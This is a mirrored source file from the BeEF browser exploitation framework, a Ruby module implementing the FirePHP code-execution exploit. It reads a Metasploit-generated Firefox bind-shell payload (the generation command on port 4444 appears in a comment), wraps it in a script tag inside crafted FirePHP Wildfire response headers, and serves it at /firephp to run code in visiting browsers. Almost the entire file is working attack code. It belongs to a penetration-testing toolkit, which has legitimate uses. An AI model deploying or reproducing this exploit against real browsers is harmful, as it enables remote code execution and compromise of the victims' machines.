Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/firephp/module.rb
1154 views
1
#

2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
# Browser Exploitation Framework (BeEF) - https://beefproject.com

4
# See the file 'doc/COPYING' for copying permission

5
###

6
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html

7
###

8
class Firephp_code_exec < BeEF::Core::Command

9
  def pre_send

10
    rand_str = rand(32**10).to_s(32)

11


12
    # load payload.js file

13
    # generate payload:

14
    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js

15
    payload = ''

16
    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")

17
    f.each_line do |line|

18
      payload << line

19
    end

20
    f.close

21


22
    # construct exploit+payload HTTP response

23
    exploit = {

24
      'RequestHeaders' => {

25
        '1' => rand(10).to_s,

26
        '2' => rand(10).to_s,

27
        '3' => rand(10).to_s,

28
        '4' => rand(10).to_s,

29
        '5' => rand(10).to_s,

30
        '6' => rand(10).to_s,

31
        '7' => rand(10).to_s,

32
        '8' => rand(10).to_s,

33
        '9' => rand(10).to_s,

34
        "<script>#{payload}<\/SCRIPT>" => rand_str

35
      }

36
    }.to_json

37


38
    # mount exploit+payload at /firephp

39
    # @todo use Router class instead of bind_raw()

40
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',

41
                                                                       {

42
                                                                         'Content-Type' => 'text/html',

43
                                                                         'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',

44
                                                                         'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',

45
                                                                         'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',

46
                                                                         'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"

47
                                                                       },

48
                                                                       rand_str,   # HTTP body

49
                                                                       '/firephp', # URI mount point

50
                                                                       -1)

51
  end

52


53
  def post_execute

54
    save({ 'result' => @datastore['result'] })

55
  end

56
end

57


58